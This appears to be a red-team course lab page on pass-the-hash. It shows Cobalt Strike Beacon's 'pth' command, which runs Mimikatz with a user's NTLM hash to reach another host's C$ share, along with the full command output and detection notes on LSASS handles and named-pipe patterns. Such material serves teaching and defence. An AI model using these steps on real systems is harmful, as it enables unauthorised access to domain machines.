Pass the Hash

Pass the hash is a technique that allows you to authenticate to a Windows service using the NTLM hash of a user's password. It works by starting a new logon session with a fake identity and then replacing the session information with the domain, username and NTLM hash provided.

Beacon has a dedicated pth command which executes Mimikatz in the background.

This command requires elevated privileges.


First, attempt to list the C$ share of the WEB machine - this will fail because bfarmer is not a local admin there.

beacon> getuid
[*] You are DEV\bfarmer (admin)

beacon> ls \\\c$
[-] could not open \\\c$\*: 5 - ERROR_ACCESS_DENIED


Then run the pth command with jking's username and NTLM hash.

beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c

user	: jking
domain	: DEV
program	: C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08
impers.	: no
NTLM	: 59fc0f884922b4ce376051134c71e22c
  |  PID  1932
  |  TID  6600
  |  LSA Process is now R/W
  |  LUID 0 ; 7479840 (00000000:00722220)
  \_ msv1_0   - data copy @ 000001F6344B3D20 : OK !
  \_ kerberos - data copy @ 000001F6345BD7C8
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001F6344C6128 (32) -> null


We can see that the command Mimiktaz runs passes the new credentials over a named pipe, which Beacon then impersonates automatically. We can then attempt to list the C$ share again, which will succeed.

beacon> ls \\\c$
[*] Listing: \\\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 18:50:13   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     08/15/2022 18:58:09   inetpub
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/24/2022 11:02:25   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     08/31/2022 17:40:32   ProgramData
          dir     08/15/2022 18:31:08   Recovery
          dir     08/30/2022 11:16:24   System Volume Information
          dir     08/30/2022 17:51:08   Users
          dir     08/30/2022 20:19:27   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/01/2022 07:26:41   DumpStack.log.tmp
 384mb    fil     09/01/2022 07:26:41   pagefile.sys


To "drop" impersonation afterwards, use the rev2self command.

beacon> rev2self
[*] Tasked beacon to revert token

beacon> ls \\\c$
[-] could not open \\\c$\*: 5 - ERROR_ACCESS_DENIED


OPSEC Two opportunities to detect PTH are the R/W handle to LSASS; and looking for the echo foo > \\.\pipe\bar pattern in command-line logs.


The former is already part of the "Suspicious Handle to LSASS" saved search. This time we see an access mask of 0x1038. This is a combination of PROCESS_QUERY_LIMITED_INFORMATION (0x1000), PROCESS_VM_WRITE (0x0020), PROCESS_VM_READ (0x0010) and PROCESS_VM_OPERATION (0x0008).



The latter can be found via the "Suspicious Named Pipe Impersonation" search, which queries process events where the arguments contain "echo", ">" and "\\.\pipe\".


Last updated